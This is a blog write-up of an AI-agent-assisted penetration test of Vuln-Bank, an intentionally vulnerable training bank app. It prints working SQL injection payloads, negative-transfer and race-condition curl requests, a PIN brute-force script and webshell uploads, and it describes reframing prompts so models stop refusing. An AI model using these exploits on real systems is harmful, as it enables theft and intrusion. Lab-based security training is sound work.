You get the most devastating security assessment in banking history.”
⚠️ Important Context & Limitations
Vulnerable by Design: Vuln-Bank is an intentionally vulnerable application created for educational and training purposes. It contains deliberately implemented security flaws that would never exist in a properly designed production banking system. The extreme number and severity of vulnerabilities found (21 critical issues) reflect this intentional design rather than typical real-world applications.
AI Evolution: This assessment represents AI capabilities as of May 2025 using Claude Sonnet 4. As AI technology continues to advance rapidly, future versions will likely demonstrate even more sophisticated reasoning, pattern recognition, and vulnerability discovery capabilities. What you see here is the worst AI will ever be at cybersecurity – it will only get better from here.
Methodology Focus: The primary value of this assessment lies not in the specific vulnerabilities found, but in demonstrating the revolutionary potential of human-AI collaboration in cybersecurity. The strategic prompting framework, systematic execution approach, and evidence collection methodology represent reproducible techniques applicable to real-world security assessments.
Real-World Application: While Vuln-Bank’s vulnerabilities are extreme, the human-AI collaboration methodology demonstrated here has been successfully applied to actual production systems, revealing genuine security issues in enterprise environments with significantly more sophisticated defenses.
The Genesis: A NaijaSecForce Conversation
It all started two weeks ago during one of our regular NaijaSecForce group discussions. We were deep into exploring AI use cases across our different companies when the conversation turned to cybersecurity applications. As we shared experiences about integrating AI into our security workflows, I found myself describing a concept that had been brewing in my mind.
“Think about it,” I said to the group, “while you’re intercepting requests with Burp Suite, why not let AI go loose on the APIs and applications? But not in the traditional way – not just throwing a series of payloads blindly at targets.”
I explained my “Plan-to-Exploit” methodology – a controlled approach I’d been playing around with for the past 8 months. The concept was simple: AI first enumerates the target, understands its architecture, then comes up with a detailed testing plan including exclusions and specific focus areas. This plan then becomes custom instructions for everything the AI needs to do during the assessment.
In some cases, I feed Cline a Postman collection file to work with directly. In others, I let Burp Suite handle the crawling to map out all the endpoints and capture the requests and responses. I then extract the relevant request paths and feed them into Cline for focused testing.
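The extraction step can be sketched roughly as follows. This is a minimal illustration, not the tooling used in the assessment: it assumes a Postman Collection v2.x export, where folders nest under `item` and each request carries a `method` and a `url`. The function name `extract_endpoints` and the sample collection are hypothetical; the two paths in the sample are ones that appear later in this write-up.

```python
import json

def extract_endpoints(collection: dict) -> list:
    """Walk a Postman collection and return (method, url) pairs."""
    found = []

    def walk(items):
        for item in items:
            if "item" in item:
                # A folder: recurse into its children.
                walk(item["item"])
            elif "request" in item:
                request = item["request"]
                url = request.get("url", "")
                # The URL may be a plain string or an object with a "raw" field.
                if isinstance(url, dict):
                    url = url.get("raw", "")
                found.append((request.get("method", "GET"), url))

    walk(collection.get("item", []))
    return found

# Hypothetical two-request collection, for illustration only.
sample = json.loads("""
{
  "item": [
    {"name": "Transfers", "item": [
      {"name": "Transfer",
       "request": {"method": "POST",
                   "url": {"raw": "http://localhost:5050/transfer"}}}
    ]},
    {"name": "Bill history",
     "request": {"method": "GET",
                 "url": "http://localhost:5050/api/bill-payments/history"}}
  ]
}
""")

endpoints = extract_endpoints(sample)
```

The resulting list of method and URL pairs is the kind of compact input that can be pasted into the testing plan as the scope for focused testing.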
The group was intrigued. “So instead of automated chaos, you get systematic intelligence?” one member asked. Exactly. The AI becomes your strategic partner, not just another tool.
But let me be honest – this journey hadn’t been smooth. Over the past 8 months, I’d experimented with various AI models, each presenting unique challenges:
- Claude 3 Sonnet: My first serious attempt, but constantly hit walls with “I can’t perform penetration testing without proper authorization”
- Claude 3 Opus: More capable, but still overly cautious about security testing
- Uncensored models: Explored alternatives to bypass constraints, but lacked the reasoning sophistication needed
- Claude 3.5 Sonnet: Better reasoning, but still had authorization concerns
- Claude Sonnet 4: The breakthrough – finally found the perfect balance of advanced reasoning, capability, and cooperation
The key wasn’t just finding the right model – it was developing the right prompting strategies, the right context setting, and the right way to frame security testing as legitimate research rather than malicious activity. Claude Sonnet 4 proved to be the game-changer with its superior reasoning capabilities and willingness to engage in complex security scenarios when properly contextualized.
That conversation with NaijaSecForce reminded me I had the perfect test case sitting right there: Vuln-Bank, a deliberately vulnerable banking application developed by Al Amir Badmus (available at github.com/Commando-X/vuln-bank). Time to put 8 months of methodology refinement to the ultimate test with Claude Sonnet 4 as my AI partner.
The Target: A Digital Bank’s Worst Nightmare
🎯 TARGET ACQUIRED
Application: Vuln-Bank
URL: http://localhost:5050
Type: Complete Black-Box Assessment
Knowledge Level: Zero (URL only)
Mission: Find and exploit every vulnerability
Complete Vulnerability Inventory
Here’s a comprehensive list of all 21 critical vulnerabilities discovered during our assessment:
Bill Payment Vulnerabilities
- Negative Bill Payments: The application accepts negative payment amounts, allowing financial fraud through negative payments
- Transaction History Exposure: The application exposes payment history of other users, enabling unauthorized access to sensitive financial information
- Race Conditions in Payment Processing: The application processes concurrent payment requests without proper isolation, allowing bypassing balance checks
- Missing Payment Limits: The application has no rate limiting or transaction count restrictions, enabling automated attacks
- Predictable Reference Numbers: The application uses sequential reference numbers for bill payments, enabling payment enumeration and forgery
- BOLA in Payment History Access: The application allows accessing payment details of other users through query parameters
File Operation Vulnerabilities
- Unrestricted File Upload: The application allows uploading files with dangerous extensions, enabling remote code execution
- No File Type Validation: The application accepts any file type without validation, enabling malware distribution
- No File Size Limits: The application has no file size restrictions, enabling denial of service attacks
- Path Traversal Vulnerabilities: The application inadequately sanitizes filenames with directory traversal sequences
- Unsafe File Naming: The application uses simple replacement for special characters in filenames, potentially enabling XSS
Authentication Vulnerabilities
- SQL Injection in Login Endpoint: The login endpoint is vulnerable to SQL injection, allowing complete authentication bypass
- Trivial Password Reset Bypass: Password resets use only 3-digit PINs with no rate limiting, enabling account takeover
- JWT Secret Exposure: The application exposes JWT secrets in debug logs, enabling token forgery
Transaction Vulnerabilities
- Negative Amount Transfers: The application accepts negative transfer amounts, allowing unlimited fund generation
- No Validation on Recipient Accounts: The application doesn’t validate recipient accounts, enabling money laundering
- Race Conditions in Transfers: The application is vulnerable to race conditions, allowing exceeding available balance
- No Transaction Limits: The application has no transaction limits or rate limiting, enabling automated attacks
- Transaction History Information Disclosure: The application exposes transaction history and is vulnerable to SQL injection
Other Critical Vulnerabilities
- Complete Payment Card Data Exposure: The application returns complete, unmasked card numbers and CVV codes in API responses
- Debug Mode Enabled: The application runs with debug mode enabled, exposing sensitive information in logs
Picture this: You’re handed a single URL – http://localhost:5050 – and told it’s a banking application called “Vuln-Bank.” That’s it. No source code, no documentation, no insider knowledge. Just a web address and the challenge to uncover its secrets.
This is the essence of black-box penetration testing – approaching a target with the same level of knowledge as a real-world attacker. But this time, I wasn’t going in alone. I had a secret weapon: Cline, an AI assistant powered by Claude Sonnet 4, ready to help me systematically tear apart this digital fortress.
Meet My AI Partner: Cline (Claude Sonnet 4)
Cline isn’t your typical security scanner. While traditional tools mindlessly throw payloads at applications, Cline thinks, adapts, and learns. Powered by Claude Sonnet 4’s advanced reasoning capabilities, it’s like having a brilliant senior penetration tester who never gets tired, never misses a detail, and can execute complex attack chains with surgical precision.
The beauty of human-AI collaboration in pentesting isn’t about replacing human expertise – it’s about amplifying it. I provide the strategic direction, the business context, and the ethical boundaries. Cline provides the systematic execution, the tireless attention to detail, and the ability to process vast amounts of information without fatigue.
First Contact: Reconnaissance
With that simple command, Cline sprang into action. Within minutes, it had mapped the entire application structure, identified the technology stack, and discovered something that made my blood run cold:
Target: http://localhost:5050
Technology: Flask/Python application
Database: SQLite
Authentication: JWT tokens
Status: DEBUG MODE ENABLED (Critical!)
Debug mode enabled in production? That’s like leaving the bank vault door wide open with a sign saying “Free Money Inside.” But this was just the beginning of our digital heist.
The Human-AI Dance: Strategic Prompting
The key to effective AI-powered pentesting lies in strategic prompting. It’s not about giving the AI a list of vulnerabilities to check – it’s about guiding it to think like an attacker while maintaining the systematic approach of a professional security assessment.
I guided Cline to understand the application’s purpose, technology stack, and basic functionality.
Together, we developed a comprehensive testing plan covering 80+ test cases across 8 major vulnerability categories.
Cline systematically executed each test case while I provided strategic guidance and validation.
We chained vulnerabilities together to achieve maximum impact and demonstrate real-world attack scenarios.
The First Crack: SQL Injection Gold Mine
Every penetration tester knows that feeling when you find your first vulnerability. But what Cline discovered wasn’t just a vulnerability – it was the master key to the entire kingdom.
Within seconds, Cline had crafted the perfect payload:
Username: admin' OR '1'='1
Password: anything
# What happened in the database:
SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'
The response was immediate and devastating. Not only did we bypass authentication completely, but the debug logs revealed something that made my jaw drop:
💀 CRITICAL: Complete System Exposure
Debug – Query result: [(1, 'admin', 'hacked123', 'ADMIN001', Decimal('999800.00'), True, None, '393')]
Debug – Found user: (1, 'admin', 'hacked123', 'ADMIN001', Decimal('999800.00'), True, None, '393')
Debug – Generated token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…
Exposed in plain text: Admin password (‘hacked123’), account balance ($999,800), reset PIN (‘393’), complete database structure, and a valid JWT token!
In a real-world scenario, this single vulnerability would have given us complete control over the bank’s systems. But we were just getting started.
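Why the payload works comes down to operator precedence: AND binds tighter than OR, so the injected condition reads as username='admin' OR ('1'='1' AND password='anything'), and the admin row comes back whatever the password is. The sketch below reproduces that against an in-memory SQLite database and contrasts it with a parameterized query. The table layout and function names are assumptions for illustration; Vuln-Bank's actual server code is not shown in this assessment.

```python
import sqlite3

# Hypothetical, simplified users table for illustration.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
)
conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'hacked123')")

def login_vulnerable(username, password):
    # String interpolation lets quote characters in the input rewrite the query.
    query = (
        "SELECT id, username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(query).fetchone()

def login_parameterized(username, password):
    # Placeholders keep the input as data; it is never parsed as SQL.
    query = "SELECT id, username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()

payload = "admin' OR '1'='1"
vulnerable_row = login_vulnerable(payload, "anything")  # admin row, no password needed
safe_row = login_parameterized(payload, "anything")     # no match
```

With placeholders, the whole payload is compared as a literal username, so the lookup simply finds no such user.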
The Money Printer: Business Logic Nightmare
With admin access secured, Cline turned its attention to the core banking functionality. What it discovered next defied belief.
The results were catastrophic. Cline discovered that the application would accept negative transfer amounts, effectively turning the transfer function into a money printing machine:
curl -X POST http://localhost:5050/transfer \
  -H "Content-Type: application/json" \
  -H "Cookie: token=eyJ0eXAi…" \
  -d '{
    "to_account": "8743567765",
    "amount": -1000,
    "description": "Testing negative amount transfer"
  }'
# Response:
{
  "status": "success",
  "message": "Transfer of $-1000 completed",
  "new_balance": "$1,000,800.00"
}
# Mathematical Magic:
# Original Balance: $999,800
# Transfer Amount: -$1,000 (negative!)
# New Balance: $999,800 - (-$1,000) = $1,000,800
# Money Generated: $1,000 from thin air!
💰 UNLIMITED MONEY GENERATION CONFIRMED
With this vulnerability, an attacker could generate infinite funds, causing unlimited financial damage to the institution.
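The missing control here is a server-side check that the amount is a positive, finite number before any balance arithmetic happens. A minimal sketch of such a check follows; the function name and error messages are hypothetical, and it assumes balances are handled as `Decimal` values.

```python
from decimal import Decimal, InvalidOperation

def validate_transfer_amount(raw_amount, balance: Decimal) -> Decimal:
    """Return the amount as a Decimal, or raise ValueError if it is unusable."""
    try:
        amount = Decimal(str(raw_amount))
    except InvalidOperation:
        raise ValueError("amount is not a number")
    # Reject NaN/Infinity first, then zero and negative values.
    if not amount.is_finite() or amount <= 0:
        raise ValueError("amount must be a positive number")
    if amount > balance:
        raise ValueError("insufficient funds")
    return amount
```

With this in place, the -1000 request above would be rejected before the subtraction that turned it into a credit.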
The Transaction Nightmare: More Financial Exploits
Continuing our methodical approach, Cline discovered several more critical vulnerabilities in the transaction system:
🏦 CRITICAL: No Validation on Recipient Accounts
curl -X POST http://localhost:5050/transfer \
  -H "Content-Type: application/json" \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -d '{
    "to_account": "MONEY_LAUNDERING_ACCOUNT_123",
    "amount": 500000,
    "description": "Exploiting no validation on recipient accounts"
  }'
# Response:
{
  "message": "Transfer Completed",
  "new_balance": 1501395.0,
  "status": "success"
}
⚡ CRITICAL: Race Conditions in Transfers
for i in {1..5}; do
  curl -s -X POST "http://localhost:5050/transfer" \
    -H "Content-Type: application/json" \
    -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
    -d "{
      \"to_account\": \"USER001\",
      \"amount\": 400000,
      \"description\": \"Race condition exploit transfer #$i\"
    }" &
done
wait
Initial balance: $1,501,395.00
Final balance after concurrent transfers: $301,395.00
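Race conditions of this kind usually come from reading the balance, checking it, and writing the new value as separate steps. One common remedy is to fold the check into the write itself, so the database decides atomically whether the debit applies. The sketch below shows the idea with SQLite; the `accounts` table, the `debit` function, and the amounts are hypothetical, and the calls run sequentially purely to show the guard rejecting debits once funds run out.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER)")
conn.execute("INSERT INTO accounts (id, balance) VALUES (1, 1000)")

def debit(account_id: int, amount: int) -> bool:
    """Deduct amount only if the balance still covers it, in one statement."""
    with conn:  # commits on success, rolls back on error
        cursor = conn.execute(
            "UPDATE accounts SET balance = balance - ? "
            "WHERE id = ? AND balance >= ?",
            (amount, account_id, amount),
        )
    # rowcount is 1 when the guarded update applied, 0 when it was refused.
    return cursor.rowcount == 1

# Five debits of 400 against a balance of 1000: only two can succeed.
results = [debit(1, 400) for _ in range(5)]
final_balance = conn.execute(
    "SELECT balance FROM accounts WHERE id = 1"
).fetchone()[0]
```

Because the comparison and the subtraction happen in the same statement, there is no window in which two requests can both pass a stale balance check.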
🔍 CRITICAL: Transaction History Information Disclosure
curl -X GET "http://localhost:5050/transactions/USER001%27%20UNION%20SELECT%201,%27HACKED%27,%27HACKED%27,1000,%272025-06-04%27,%27hacked%27,%27Sensitive%20data%20stolen%27--" \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…"
# Response:
{
  "account_number": "USER001' UNION SELECT 1,'HACKED','HACKED',1000,'2025-06-04','hacked','Sensitive data stolen'--",
  "server_time": "2025-06-04 20:32:37.462050",
  "status": "success",
  "transactions": [
    {
      "amount": 1000.0,
      "description": "Sensitive data stolen",
      "from_account": "HACKED",
      "id": 1,
      "query_used": "\n SELECT \n id,\n from_account,\n to_account,\n amount,\n timestamp,\n transaction_type,\n description\n FROM transactions \n WHERE from_account='USER001' UNION SELECT 1,'HACKED','HACKED',1000,'2025-06-04','hacked','Sensitive data stolen'--' OR to_account='USER001' UNION SELECT 1,'HACKED','HACKED',1000,'2025-06-04','hacked','Sensitive data stolen'--'\n ORDER BY timestamp DESC\n ",
      "timestamp": "2025-06-04 00:00:00",
      "to_account": "HACKED",
      "type": "hacked"
    }
  ]
}
🔄 HIGH: No Transaction Limits
for i in {1..10}; do
  curl -X POST http://localhost:5050/transfer \
    -H "Content-Type: application/json" \
    -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
    -d '{
      "to_account": "USER001",
      "amount": 1,
      "description": "Rapid transfer test #'$i'"
    }'
done
All 10 transfers completed successfully without any rate limiting
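For contrast, here is a minimal sketch of the kind of per-account throttle that would have stopped this loop. It is an in-memory sliding-window limiter; the class name, the limit of three requests per minute, and the injectable `now` argument (used so the example runs without sleeping) are all assumptions for illustration, not anything Vuln-Bank provides.

```python
import time
from collections import defaultdict, deque
from typing import Optional

class SlidingWindowLimiter:
    """Allow at most max_requests per key within any window_seconds span."""

    def __init__(self, max_requests: int, window_seconds: float):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._hits = defaultdict(deque)  # key -> timestamps of accepted requests

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        hits = self._hits[key]
        # Forget accepted requests that have aged out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True

limiter = SlidingWindowLimiter(max_requests=3, window_seconds=60)
# Ten transfer attempts one second apart, as in the loop above.
decisions = [limiter.allow("ADMIN001", now=float(t)) for t in range(10)]
```

Only the first three attempts are accepted; the remaining seven would receive an error until the window moves on. A production deployment would typically keep this state in a shared store rather than process memory.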
The Bill Payment Disaster: Financial Controls Bypass
Continuing our systematic approach, Cline turned its attention to the bill payment functionality. What it discovered was yet another set of critical vulnerabilities that could be exploited for financial fraud.
The results were shocking. Cline discovered multiple critical vulnerabilities in the bill payment system:
💸 CRITICAL: Negative Bill Payments
curl -X POST http://localhost:5050/api/bill-payments/create \
  -H "Content-Type: application/json" \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -d '{
    "biller_id": 1,
    "amount": -1000,
    "payment_method": "account",
    "description": "Testing amount validation with -1000"
  }'
# Response:
{
  "message": "Payment processed successfully",
  "payment_details": {
    "amount": -1000.0,
    "card_id": null,
    "payment_method": "account",
    "processed_by": "admin",
    "reference": "BILL1749055911",
    "timestamp": "2025-06-04 20:51:51.686213"
  },
  "status": "success"
}
🔓 CRITICAL: Transaction History Exposure
curl -X GET "http://localhost:5050/api/bill-payments/history?user_id=2" \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…"
# Response:
{
  "payments": [
    {
      "amount": 10.0,
      "biller_name": "City Water",
      "card_number": null,
      "category_name": "Utilities",
      "created_at": "2025-06-04 20:51:53.764382",
      "description": "Testing reference number predictability 2",
      "id": 7,
      "payment_method": "account",
      "processed_at": null,
      "reference": "BILL1749055913",
      "status": "pending"
    },
    …
  ],
  "status": "success"
}
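The underlying flaw is that the server trusts a client-supplied `user_id` instead of the identity carried in the token. A minimal sketch of an ownership check is shown below; the claim name `user_id` and the function name are hypothetical, since the token's actual contents are not shown in this assessment.

```python
def resolve_history_owner(token_claims: dict, requested_user_id=None) -> int:
    """Return the user whose history may be read, based on the token alone."""
    caller_id = int(token_claims["user_id"])
    # No parameter, or the caller's own id: serve the caller's history.
    if requested_user_id is None or int(requested_user_id) == caller_id:
        return caller_id
    # Anything else is a request for someone else's data.
    raise PermissionError("cannot read another user's payment history")
```

Whether administrators get an explicit, audited exception to this rule is a policy decision; the point is that the decision is made from verified token claims, never from a query parameter.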
⚡ CRITICAL: Race Conditions & No Payment Limits
for i in {1..5}; do
  curl -X POST http://localhost:5050/api/bill-payments/create \
    -H "Content-Type: application/json" \
    -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
    -d '{
      "biller_id": 1,
      "amount": 100,
      "payment_method": "account",
      "description": "Testing race conditions"
    }' &
done
All 5 concurrent payments processed successfully
No transaction isolation, no rate limiting, no daily limits
🔢 CRITICAL: Predictable Reference Numbers
# Created multiple payments and observed the reference numbers
# Response:
Payment 1: BILL1749055911
Payment 2: BILL1749055912
Payment 3: BILL1749055913
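One observation worth adding: the numeric suffix looks like Unix epoch seconds rather than a plain counter. The payments logged at 20:51:51 and 20:51:53 carry references ending in ...911 and ...913, and decoding the suffix as epoch seconds gives matching minute and second fields. That reading is an inference from the captured output, not something confirmed from the source code. The sketch below decodes a reference under that assumption and shows a hypothetical alternative that draws the reference from the OS random source instead.

```python
import secrets
from datetime import datetime, timezone

def decode_reference(reference: str) -> datetime:
    """Interpret the digits after 'BILL' as Unix epoch seconds (an assumption)."""
    return datetime.fromtimestamp(int(reference.removeprefix("BILL")), tz=timezone.utc)

def random_reference() -> str:
    """Hypothetical alternative: 128 random bits, not derivable from the clock."""
    return "BILL" + secrets.token_hex(16).upper()

decoded = decode_reference("BILL1749055911")
```

If the assumption holds, anyone who knows roughly when a payment was made can narrow its reference to a handful of candidates, which is what makes enumeration practical.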
The Card Catastrophe: PCI DSS Nightmare
As if unlimited money generation wasn’t enough, Cline’s systematic approach uncovered another devastating flaw in the virtual card system.
The results violated every principle of payment card security:
💳 CRITICAL: Complete Payment Card Data Exposure
# Created a virtual card through the API
# Response:
{
  "card_number": "2096 5158 6592 6149", // Complete PAN exposed!
  "cvv": "389", // CVV in plaintext!
  "expiry": "05/26",
  "limit": "$9,999,999", // $9.9M limit approved!
  "status": "success"
}
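A safer response would expose only a masked card number and would never echo the CVV. The following is a minimal sketch of that shaping step, showing only the last four digits; the function names and the choice of which fields to return are assumptions for illustration.

```python
def mask_pan(card_number: str) -> str:
    """Replace all but the last four digits of a card number with asterisks."""
    digits = [c for c in card_number if c.isdigit()]
    if len(digits) < 13:
        raise ValueError("not a plausible card number")
    return "*" * (len(digits) - 4) + "".join(digits[-4:])

def public_card_view(card: dict) -> dict:
    """Build the API response from an internal card record, omitting the CVV."""
    return {
        "card_number": mask_pan(card["card_number"]),
        "expiry": card["expiry"],
        "status": card["status"],
    }

# The record captured above, used as sample input.
captured = {
    "card_number": "2096 5158 6592 6149",
    "cvv": "389",
    "expiry": "05/26",
    "limit": "$9,999,999",
    "status": "success",
}
safe_view = public_card_view(captured)
```

Building the response from an explicit allowlist of fields, rather than serializing the whole record, means a newly added sensitive column does not leak by default.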
The AI Advantage: Systematic Destruction
What made this assessment truly remarkable wasn’t just the vulnerabilities we found, but how we found them. Cline’s systematic approach ensured we didn’t miss anything:
While I provided strategic direction and business context, Cline executed with machine-like precision:
- Authentication Testing: SQL injection, weak passwords, session management
- Authorization Testing: Privilege escalation, access control bypasses
- Input Validation: Injection attacks, business logic flaws
- Data Security: Information disclosure, encryption weaknesses
- Session Management: Token manipulation, session hijacking
- Business Logic: Financial transaction flaws, workflow bypasses
- Bill Payment Processing: Amount validation, transaction limits, reference number generation
- File Operations: Upload validation, file type checking, path traversal
The Complete Compromise: Chaining Attacks
The true power of human-AI collaboration became evident when we started chaining vulnerabilities together. What began as individual security flaws became a complete system takeover:
SQL injection bypass → Admin JWT token → System access
Negative transfers → Unlimited money generation → Virtual card creation
Admin panel access → Complete user database → Payment card data
Password reset bypass → Account takeover → Permanent access
The Hidden Admin Panel: Secret Backdoor
Just when we thought we’d seen everything, Cline made another shocking discovery:
URL: http://localhost:5050/sup3r_s3cr3t_admin
Access: JWT token from SQL injection
Result: Complete user database exposed
# Sample exposed data:
{
  "users": [
    {
      "id": 1,
      "username": "admin",
      "balance": "$1,000,800.00",
      "account_number": "ADMIN001",
      "is_admin": true
    },
    {
      "id": 2,
      "username": "user1",
      "balance": "$5,000.00",
      "account_number": "USER001",
      "is_admin": false
    }
    // … all users exposed
  ]
}
This hidden endpoint exposed the complete user database, including account balances, personal information, and administrative status – a treasure trove for any attacker.
The Weak Link: 3-Digit PIN Catastrophe
As if the application couldn’t get any worse, Cline discovered that password resets used only 3-digit PINs. But what happened next showcased the true power of AI-driven security testing.
Within seconds, Cline had automatically generated and executed a complete brute force attack:
import requests

BASE_URL = "http://localhost:5050"  # local Vuln-Bank instance only
# Generated 1,000 PIN combinations in milliseconds: '000' through '999'
PIN_RANGE = [f"{n:03d}" for n in range(1000)]
# Automated brute force execution
for pin in PIN_RANGE:
    response = requests.post(f"{BASE_URL}/reset-password",
                             data={"username": "admin", "pin": pin})
    if "success" in response.text:
        print(f"[+] PIN CRACKED: {pin}")
        break
# Result: PIN '393' cracked in 0.8 seconds
# Total requests: 394 out of 1,000 possible
🔓 CRITICAL: Trivial Password Reset Bypass
PIN Range: 000-999 (only 1,000 possibilities)
Rate Limiting: None
Auto-Generated Payloads: 1,000 combinations in milliseconds
Time to Crack: 0.8 seconds (PIN ‘393’ found on attempt 394)
Impact: Complete account takeover for any user
The beauty of AI-powered testing was evident here. While a human tester might manually try a few common PINs or write a custom script, Cline instantly recognized the vulnerability pattern, auto-generated the complete payload set, and executed a systematic brute force attack – all within seconds of identifying the weakness.
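The figures above also show why a longer PIN alone would not be enough. At the observed pace of 394 requests in 0.8 seconds, the arithmetic below estimates the worst-case time to exhaust PIN spaces of different lengths. It assumes the request rate stays constant, which is a simplification.

```python
def worst_case_seconds(pin_digits: int, requests_per_second: float) -> float:
    """Time to try every PIN of the given length at a fixed request rate."""
    return (10 ** pin_digits) / requests_per_second

# Rate taken from the run above: 394 requests in 0.8 seconds.
observed_rate = 394 / 0.8

three_digit = worst_case_seconds(3, observed_rate)  # about 2 seconds
six_digit = worst_case_seconds(6, observed_rate)    # about 34 minutes
```

Even a six-digit PIN falls in roughly half an hour at that rate, so attempt limits and lockouts matter at least as much as PIN length.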
The File Upload Fiasco: Remote Code Execution
As we continued our systematic assessment, Cline discovered yet another critical vulnerability in the profile picture upload functionality.
The results were alarming. Cline discovered that the application had no protection against malicious file uploads:
🔥 CRITICAL: Unrestricted File Upload
curl -X POST http://localhost:5050/upload_profile_picture \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -F "profile_picture=@webshell.php"
# Response:
{
  "file_path": "static/uploads/603898_webshell.php",
  "message": "Profile picture uploaded successfully",
  "status": "success"
}
# Accessing the uploaded PHP file:
http://localhost:5050/static/uploads/603898_webshell.php
# Result: PHP code executed on the server!
⚠️ CRITICAL: No File Type Validation
curl -X POST http://localhost:5050/upload_profile_picture \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -F "profile_picture=@executable.exe"
# Response:
{
  "file_path": "static/uploads/921099_executable.exe",
  "message": "Profile picture uploaded successfully",
  "status": "success"
}
📁 HIGH: No File Size Limits
curl -X POST http://localhost:5050/upload_profile_picture \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -F "profile_picture=@large_file_1000KB.dat"
# Response:
{
  "file_path": "static/uploads/185265_large_file_1000KB.dat",
  "message": "Profile picture uploaded successfully",
  "status": "success"
}
🔀 HIGH: Path Traversal Vulnerabilities
curl -X POST http://localhost:5050/upload_profile_picture \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -F "profile_picture=@traversal_test.txt;filename=../traversal_test.txt"
# Response:
{
  "file_path": "static/uploads/815195_traversal_test.txt",
  "message": "Profile picture uploaded successfully",
  "status": "success"
}
📝 MEDIUM: Unsafe File Naming
curl -X POST http://localhost:5050/upload_profile_picture \
  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…" \
  -F "profile_picture=@naming_test.txt;filename=quotes'\"\`.txt"
# Response:
{
  "file_path": "static/uploads/272430_quotes22.txt",
  "message": "Profile picture uploaded successfully",
  "status": "success"
}
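Taken together, the upload findings point at three missing checks: a size cap, an extension allowlist, and a server-generated filename. The sketch below combines them using only the standard library. The allowlist, the 2 MiB cap, and the function name are hypothetical choices, and an extension check alone does not prove the content is an image, so treat this as a first layer rather than complete validation.

```python
import os
import uuid

ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}  # hypothetical allowlist
MAX_UPLOAD_BYTES = 2 * 1024 * 1024                      # hypothetical 2 MiB cap

def safe_stored_name(client_filename: str, size_bytes: int) -> str:
    """Validate an upload and return the name to store it under."""
    if size_bytes > MAX_UPLOAD_BYTES:
        raise ValueError("file too large")
    # Drop any directory components supplied by the client.
    base = os.path.basename(client_filename.replace("\\", "/"))
    extension = os.path.splitext(base)[1].lower()
    if extension not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {extension!r} not allowed")
    # Server-generated name: nothing from the client survives except
    # the vetted extension, so quotes and traversal sequences cannot leak in.
    return uuid.uuid4().hex + extension
```

For example, `safe_stored_name("../../me.PNG", 1000)` yields a random 32-character hex name ending in `.png`, while `webshell.php` and `executable.exe` are rejected outright.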
The Debug Disaster: System Confession
Throughout our entire assessment, the application was confessing its sins in real-time through debug logs:
Debug – Login query: SELECT * FROM users WHERE username='admin' AND password='hacked123'
Debug – Transfer query: UPDATE users SET balance = 1000800.0 WHERE id = 1
Debug – Card generation: Generated card 2096515865926149 with CVV 389
Debug – JWT secret: Using secret key 'secret123' for token generation
Debug – Database path: /app/database/vulnbank.db
Every action we took was logged with complete technical details, exposing:
- Database queries and results
- Plaintext passwords and PINs
- JWT secrets and file paths
- Card numbers and CVVs
- System architecture details
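Beyond turning debug mode off, one defensive layer is to scrub sensitive values before they reach a log handler. The sketch below uses a standard `logging.Filter` to mask 16-digit card numbers and CVV values. The patterns and class name are assumptions for illustration and would need tuning for real log formats; it is a safety net, not a substitute for not logging secrets in the first place.

```python
import logging
import re

CARD_PATTERN = re.compile(r"\b\d{12}(\d{4})\b")       # 16 consecutive digits
CVV_PATTERN = re.compile(r"(CVV\s+)\d{3,4}", re.IGNORECASE)

class RedactCardData(logging.Filter):
    """Mask card numbers and CVVs in log records before they are emitted."""

    def filter(self, record: logging.LogRecord) -> bool:
        message = record.getMessage()  # message with arguments already merged
        message = CARD_PATTERN.sub(lambda m: "*" * 12 + m.group(1), message)
        message = CVV_PATTERN.sub(lambda m: m.group(1) + "***", message)
        record.msg = message
        record.args = ()               # arguments are now baked into msg
        return True                    # keep the record, just sanitized

# Sample record modeled on the card-generation log line above.
record = logging.LogRecord(
    "vulnbank", logging.DEBUG, "app.py", 1,
    "Generated card %s with CVV %s", ("2096515865926149", "389"), None,
)
RedactCardData().filter(record)
redacted = record.getMessage()
```

In use, the filter would be attached to each handler with `handler.addFilter(RedactCardData())` so every record passes through it.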